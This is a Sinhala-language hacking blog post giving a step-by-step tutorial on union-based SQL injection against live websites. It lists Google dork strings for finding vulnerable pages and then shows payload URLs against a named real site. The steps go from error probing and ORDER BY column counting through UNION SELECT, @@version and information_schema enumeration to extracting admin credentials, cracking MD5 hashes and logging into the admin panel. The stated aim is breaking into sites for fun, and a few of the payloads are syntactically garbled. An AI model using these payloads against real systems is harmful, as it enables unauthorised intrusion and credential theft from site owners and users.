SQL Injection ගැන දැනගනිමු - SL_Tech_Zone

Latest

SL_Tech_Zone

අපගේ නමවතම තාක්ශනික Blog අඩවියට ඔබව සාදරයෙන් පිලිගන්නව...Linux,Windows,Android පිලිබදවත්...අනෙකුත් තාක්ෂණික තොරතුරු අපගේ Blog අඩවියෙන් ඔබට ලබාගත හැක... *Education Purpose Only..! SL_TECH_ZONE Admins : Thilina & Amila

Wednesday, May 2, 2018

SQL Injection ගැන දැනගනිමු



හායි ගායිස් 😍😍..අද කට්ටියට කියල දෙන්න හදන්නෙ  මොකක්ද මේ SQL Injection කියන්නෙ සහ ඒක පාවිච්චි කරන විදිහ ගැන.මුලින්ම  බලමු මේ මම කියවන්නෙ මොකක් ගැනද කියල.උබල දන්නවනෙ  වෙබ් සයිට් එක එක විදිහට හැදිල තියනව. SQL Injections  කියන්නෙත් එන්න වගේ වෙබ් සයිට් හැදිල තියන ක්රමයක්.ඕකෙදි වැරැද්දක් උනොත් ඒක මුලු සයිට් එකටම බලපානව. SQL Injection එකකදි අපි කරන්නෙ වගේ වැරැද්දක් තියන සයිට් හොයල ඒවට රිංගල අපෙ ආතල් එක ගන්න එක 😁😁.

මේ වැරදි තියන සයිට් වලට අපි කියන්නෙ Vulnerable Site කියල.අපි දැන් කරන්න හදන්නෙ මේ Vulnerable Site එකක් හොයාගෙන ඒකට SQL Injection  එකක් ගහල සයිට් එකේ ඇඩ්මින් මේල්, පාස්වර්ඩ්  හොයාගෙන කෙලින්ම Admin Panel එකට රිංගන එක.
උබලට දැන් තියන ප්රශ්නෙ කොහොමද Vulnerable Site එකක් හොයාගන්නෙ කියලනෙ.ඒකට තමා Google Dork තියෙන්නෙ.ඩෝර්ක් කියන්නෙ මොනාද ඩෝර්ක් රොත්තක් පස්සෙ පෝස්ට් එකකින් දාන්නම්.දැනට ඔය පහල මම දාල තියන එකක් දාල නිකම්ම ගූගල් සර්ච් කරන්න.

Inurl:php?id=
products.php?type=
event.php?id=
showfeature.php?id=
home.php?ID=
tas/event.php?id=
profile.php?id=
details.php?id=
past-event.php?id=
index.php?action=
ඊටපස්සෙ එන රිසල්ට් වලින් උබල කැමති එකකට පලයන්.මම ආපු එක රිසල්ට් එකක් ගන්නම් උදාහරණෙකට.

http://bible-history.com/subcat.php?id=2

දැන් අපි කරන්න ඕනෙ මේක Vulnerable Site එකක්ද කියල බලන එක.ඒකට කරන්න ඕන ඔය ලින්ක් එකේ අගට ` දාල බලන එක.

http://bible-history.com/subcat.php?id=2`

මෙහෙම කරල error එකක් ආවෙ නැත්තම් අපිට 3 දාල බලන්න වෙනව error එකක් එනවද කියල.කම්මැලී තමා බන් ඒත් ඉතින් ඉගෙනගද්දි ඔහොම තමා..අපි දැන් හිතමු 3 දි error එකක් ආව කියල.ඊලගට අපි බලන්න ඕනෙ මේ සයිට් එකේ Column කීයක් තියනවද කියල.ඒකට පාවිච්චි කරන්නෙ  order by කියන කෝඩ් එක.

http://bible-history.com/subcat.php?id=2 order by 1--

ඔහොම කරල  MySQL error  එකක් ආවෙ නැත්තම් 2,3 විදිහට කරල බලන්න ඕන.ලේසි විදිහක් උබල ඕක කරද්දි තේරෙයි.අපි දැන් හිතමු  7 දි error   එකක් ආව කියල. කියන්නෙ Column තියෙන්නෙ 6 යි.දැන් අපි හොයාගන්න ඕන ඔය 6න් මොකක්ද Vulnerable Column එක කියල.ඒකට අපි URL එක අගට union select 1,2,3,4--විදිහට දාගන්නව තියන කොලම් ගාන වෙනකල්.හැබැයි ඒක කරද්දි ? id=1 කියලා තියන එක ?id= -1 කියල දාන්න ඕනි.ඒ කියන්නෙ අපි දැන් කරන් ආපු විදිහටනම් ලින්ක් එක මේ විදිහට තියෙන්න ඕනෙ.

http://bible-history.com/subcat.php?id=-2  union select 1,2,3,4,5,6--

එතකොට අපිට එනව වීක් කොලම් එක මොකක්ද කියල.ඒක මතක තියාගන්න.ඊලගට අපි කරන්න ඕන Database version එක මොකක්ද කියල බලන එක.දැන් දාන කමන්ඩ් එක Database version 5 හෝ ඊට වැඩි ඒවට තමා වැඩ කරන්නෙ.ඊට පහල ඒව ආවොත් කරන හැටි දන්නවනම්  කමන්ට් එකක් දාගෙනම යන්න.මේකට අපි  කරන්න ඕන කලින් ලින්ක් එකම අරගෙන අර මතක තියාගන්න කිව්ව වීක් කොලම් එක තිබ්බ තැනට  @@version කියල දාන එක.ඒ කිව්වෙ වීක් කොලම් එක 4 නම් ,

http://bible-history.com/subcat.php?id=-2  union select 1,2,3, @@version,5,6--

එතකොට අපිට 5.1.63-cll වගේ එනව වර්ශන් එක.ඊටපස්සෙ අපි බලමු මේකෙ  කොලම් ටික මොනාද කියල.මෙතන ඉදන් කෝඩ් එක දාන්නෙ ඕකෙ ඕන තැන් උබල වෙනස් කරගනිල්ල හොදද. 



http://bible-history.com/subcat.php?id=-2  union select 1,2,3,group_concat(table_name),5,6FROM information_schema.tables WHERE table_schema=database()--

ඔන්න දැන් අපිට කොලම් ටික පේනව.ඊටපස්සෙ අපි කරන්න ඕන ඇඩ්මින්ගෙ විස්තර තියන එක හොයාගන්න එක.

http://bible-history.com/subcat.php?id=-2  union select 1,2,3, group_concat(column_name)5, FROM information_schema.columns WHERE table_name="admin_credentials"

ඊටපස්සෙ ලස්සනට පිලිවෙලට Username එකයි  Password එකයි 💗.දැන් කරන්න තියෙන්නෙ Havij වගේ සොෆ්ට්වෙයා එකකින් ඇඩ්මින් පැනල් එක හොයාගෙන ඔය ආපු Username, Password ගහල ලොග් වෙන එක.ගොඩක් දුරට පාස්වර්ඩ් ඇත්තෙ  MD5 වලින්.ඒව කන්වර්ට් කරගන්න ගූගල් සර්ච් කරපන් ඕන තරම් සයිට් තියෙයි.

ඔන්න ඔහොම තමා SQL Injection කරන්නෙ.ඔහොම මුලින් පුරුදු උනාම තව අලුත් ක්‍රම  එක්කම ලේසියෙන් කරන්න පුලුවන් ක්‍රමත් අහුවෙයි.එහෙනම් පෝස්ට් එක ඉවරයි.ඔතන සමහර කෝඩ් දැම්මෙ නෑ වැඩක් නැති හන්ද.අපැහැදිලි තැන් තියෙයිනම් කියන්න අඩුපාඩු ඇති  ඒවත් අමතක නොකර කියන්න හොදේ.අන්තිමට කියන්න තියෙන්නෙ මේව නරක විදිහට පාවිච්චි කරන්නෙපා මොකද නීති විරෝධී වැඩ මෙව්ව 😂💣.

එහෙනම් අලුත්  Post එකකින් ආපහු හම්බෙමු. ජය වේවා ඔක්කොටම !!!

#ALEX

No One is Safe Security is a Joke






3 comments: